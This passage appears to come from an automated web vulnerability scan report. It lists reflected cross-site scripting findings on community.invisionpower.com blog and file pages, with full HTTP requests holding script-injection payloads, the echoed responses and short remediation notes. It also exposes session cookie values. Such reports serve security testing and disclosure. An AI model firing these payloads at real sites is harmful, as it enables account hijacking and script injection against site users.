<a href='http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?25d4c'><script>alert(1)</script>76947efd1fd=1&amp;_rcid=11554#fastreply' title="Reply directly to this post" id='reply_comment_11554' class='reply_comment'>
...[SNIP]...

3.28. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4653b"-alert(1)-"8c738f7fd40 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment4653b"-alert(1)-"8c738f7fd40 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=c07155729daa7d6d40b594c2ff1a8698; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:49 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:51 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLfOtDI0sjQzs7AwNrOwrgVcMFxc2gaw; expires=Thu, 02-Feb-2012 23:12:51 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 102097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment4653b"-alert(1)-"8c738f7fd40";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Payment Improvements &#38; Anti-Fraud Protection";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.29. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75d7b'><script>alert(1)</script>981f0c014da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment75d7b'><script>alert(1)</script>981f0c014da HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=22e858a8ab959b81f8a3bb18c5e84ab7; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:22 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:26 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLfOtDI0sjQzs7AwNjG2rgVcMFxcwwap; expires=Thu, 02-Feb-2012 23:12:26 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 102550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment75d7b'><script>alert(1)</script>981f0c014da?_rcid=11554#fastreply' title="Reply directly to this post" id='reply_comment_11554' class='reply_comment'>
...[SNIP]...

3.30. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a9c"-alert(1)-"cf40b1e321c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?e2a9c"-alert(1)-"cf40b1e321c=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:10:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=2ce9d11814a97267fd707d92e4e4934e; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:10:19 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:10:26 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MrUwMLfOtDI0sjQzs7AwMjKwrgVcMFxcJgab; expires=Thu, 02-Feb-2012 23:10:26 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?e2a9c"-alert(1)-"cf40b1e321c=1";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Custom Customer Fields";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.31. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a23e7'><script>alert(1)</script>edfdfa2120a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?a23e7'><script>alert(1)</script>edfdfa2120a=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:09:52 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=4b3644eca5f51a158215dd0c69ada06b; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:09:54 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:09:57 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MrUwMLfOtDI0sjQzs7AwtDSxrgVcMFxcSQal; expires=Thu, 02-Feb-2012 23:09:57 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?a23e7'><script>alert(1)</script>edfdfa2120a=1&amp;_rcid=11592#fastreply' title="Reply directly to this post" id='reply_comment_11592' class='reply_comment'>
...[SNIP]...

3.32. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 96d8c'><script>alert(1)</script>195a814bc00 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment96d8c'><script>alert(1)</script>195a814bc00 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:13:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f29e15c7c54cedf9b42b0ee026630452; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:13:05 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:13:07 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MrUwMLfOtDI0sjQzs7AwtjC1rgVcMFxcUgan; expires=Thu, 02-Feb-2012 23:13:07 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 89350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment96d8c'><script>alert(1)</script>195a814bc00?_rcid=11592#fastreply' title="Reply directly to this post" id='reply_comment_11592' class='reply_comment'>
...[SNIP]...

3.33. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1937a"-alert(1)-"b678fb81f8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment1937a"-alert(1)-"b678fb81f8 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:13:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=82d2df6b70fbd655dc608f59349d762d; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:13:28 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:13:32 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MrUwMLfOtDI0sjQzs7AwMbC0rgVcMFxcQwak; expires=Thu, 02-Feb-2012 23:13:32 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment1937a"-alert(1)-"b678fb81f8";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Custom Customer Fields";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.34. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7345'><script>alert(1)</script>8f568237069 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?a7345'><script>alert(1)</script>8f568237069=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=574c304259c12fb245c396fa11aa3e0c; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:27 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:30 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3sLTOtDI0sjQzs7AwNjG3rgVcMFxc3gau; expires=Thu, 02-Feb-2012 23:12:30 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 69622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?a7345'><script>alert(1)</script>8f568237069=1&amp;_rcid=11544#fastreply' title="Reply directly to this post" id='reply_comment_11544' class='reply_comment'>
...[SNIP]...

3.35. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed0d"-alert(1)-"5c4d62dddb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?aed0d"-alert(1)-"5c4d62dddb8=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=483934fd9ed109c9f59012f046077e03; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:45 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:50 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3sLTOtDI0sjQzs7AwNjO1rgVcMFxc4Aau; expires=Thu, 02-Feb-2012 23:12:50 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 69387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?aed0d"-alert(1)-"5c4d62dddb8=1";
       ipb.sharelinks.title = "Viril 1.0.1 Release With Bug Fixes &amp; New Features";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.36. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edee4"-alert(1)-"26b08451a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcommentedee4"-alert(1)-"26b08451a HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:14:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=1e8a6cf95c755b71a85b23d27acc781f; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:14:44 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:14:47 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3sLTOtDI0sjQzs7AwsTC1rgVcMFxc7Qax; expires=Thu, 02-Feb-2012 23:14:47 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 69805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcommentedee4"-alert(1)-"26b08451a";
       ipb.sharelinks.title = "Viril 1.0.1 Release With Bug Fixes &amp; New Features";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.37. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 91bc6'><script>alert(1)</script>783674a36c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment91bc6'><script>alert(1)</script>783674a36c7 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:14:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=828e007355de3a267f8189ac08ed6f71; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:14:22 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:14:24 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3sLTOtDI0sjQzs7AwMTO2rgVcMFxc3wat; expires=Thu, 02-Feb-2012 23:14:24 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 70185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment91bc6'><script>alert(1)</script>783674a36c7?_rcid=11544#fastreply' title="Reply directly to this post" id='reply_comment_11544' class='reply_comment'>
...[SNIP]...

3.38. http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eb36"-alert(1)-"326757020f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

